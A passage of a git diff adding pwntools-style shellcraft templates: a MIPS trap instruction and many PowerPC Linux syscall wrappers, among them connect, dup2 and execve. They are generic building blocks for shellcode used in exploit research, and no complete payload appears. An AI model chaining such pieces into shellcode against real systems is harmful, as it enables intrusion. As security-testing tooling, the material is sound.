endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/mips/trap.asm b/pwnlib/shellcraft/templates/mips/trap.asm new file mode 100644 index 000000000..5656e9497 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/trap.asm @@ -0,0 +1,2 @@ +<%docstring>A trap instruction. + teq $zero, $zero diff --git a/pwnlib/shellcraft/templates/powerpc/__doc__ b/pwnlib/shellcraft/templates/powerpc/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/powerpc/linux/__doc__ b/pwnlib/shellcraft/templates/powerpc/linux/__doc__ new file mode 100644 index 000000000..e69de29bb diff --git a/pwnlib/shellcraft/templates/powerpc/linux/accept.asm b/pwnlib/shellcraft/templates/powerpc/linux/accept.asm new file mode 100644 index 000000000..e8a80cdb0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/access.asm b/pwnlib/shellcraft/templates/powerpc/linux/access.asm new file mode 100644 index 000000000..31015e3d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/acct.asm b/pwnlib/shellcraft/templates/powerpc/linux/acct.asm new file mode 100644 index 000000000..9b5f60d66 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm b/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm new file mode 100644 index 000000000..ae81e236a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/bind.asm b/pwnlib/shellcraft/templates/powerpc/linux/bind.asm new file mode 100644 index 000000000..3bd1b1c63 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/brk.asm b/pwnlib/shellcraft/templates/powerpc/linux/brk.asm new file mode 100644 index 000000000..0bab8c9c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm new file mode 100644 index 000000000..f590392b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm b/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm new file mode 100644 index 000000000..bcc40cd61 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chown.asm b/pwnlib/shellcraft/templates/powerpc/linux/chown.asm new file mode 100644 index 000000000..e3b59f4c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm b/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm new file mode 100644 index 000000000..88be20c79 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm new file mode 100644 index 000000000..08a284e70 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm new file mode 100644 index 000000000..5a76c6ddb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm new file mode 100644 index 000000000..c343e947a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm new file mode 100644 index 000000000..e9abd6ff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clone.asm b/pwnlib/shellcraft/templates/powerpc/linux/clone.asm new file mode 100644 index 000000000..06eaafbeb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/close.asm b/pwnlib/shellcraft/templates/powerpc/linux/close.asm new file mode 100644 index 000000000..3cc5843e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/connect.asm b/pwnlib/shellcraft/templates/powerpc/linux/connect.asm new file mode 100644 index 000000000..c2f746be7 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/connect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall connect. See 'man 2 connect' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_connect', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/creat.asm b/pwnlib/shellcraft/templates/powerpc/linux/creat.asm new file mode 100644 index 000000000..88d0373b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup.asm new file mode 100644 index 000000000..5e28fada8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm new file mode 100644 index 000000000..7fef7cc41 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm new file mode 100644 index 000000000..5be40ffbf --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm new file mode 100644 index 000000000..6facc0919 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm new file mode 100644 index 000000000..bf9f39752 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm new file mode 100644 index 000000000..fe7665380 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm new file mode 100644 index 000000000..7eb416845 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm new file mode 100644 index 000000000..d6ec67fd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/execve.asm b/pwnlib/shellcraft/templates/powerpc/linux/execve.asm new file mode 100644 index 000000000..21020a79b --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/execve.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path, argv, envp"/> +<%docstring> +Invokes the syscall execve. See 'man 2 execve' for more information. + +Arguments: + path(char): path + argv(char): argv + envp(char): envp + + + ${syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/exit.asm b/pwnlib/shellcraft/templates/powerpc/linux/exit.asm new file mode 100644 index 000000000..41e4964b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm b/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm new file mode 100644 index 000000000..14e420329 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm b/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm new file mode 100644 index 000000000..54b8f702d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm new file mode 100644 index 000000000..39e95f6f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm new file mode 100644 index 000000000..6d1b0bd96 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm new file mode 100644 index 000000000..bfd1fcbf8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm new file mode 100644 index 000000000..588f4eb01 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm new file mode 100644 index 000000000..4eab7f6d0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm b/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm new file mode 100644 index 000000000..836f6cbcb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm b/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm new file mode 100644 index 000000000..fe95268d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/flock.asm b/pwnlib/shellcraft/templates/powerpc/linux/flock.asm new file mode 100644 index 000000000..c7bdc1035 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fork.asm b/pwnlib/shellcraft/templates/powerpc/linux/fork.asm new file mode 100644 index 000000000..058c9e90a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm new file mode 100644 index 000000000..08c294df8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm new file mode 100644 index 000000000..44178d745 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm new file mode 100644 index 000000000..81e167a8f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm b/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm new file mode 100644 index 000000000..d5326007e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm new file mode 100644 index 000000000..1e90e958f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm new file mode 100644 index 000000000..2bf43a237 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm b/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm new file mode 100644 index 000000000..761897318 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm b/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm new file mode 100644 index 000000000..2dcd14023 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm new file mode 100644 index 000000000..6b0cfe4e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm new file mode 100644 index 000000000..f293d2f6c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm new file mode 100644 index 000000000..2fffcb624 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm b/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm new file mode 100644 index 000000000..0206522d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm b/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm new file mode 100644 index 000000000..84859a160 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm 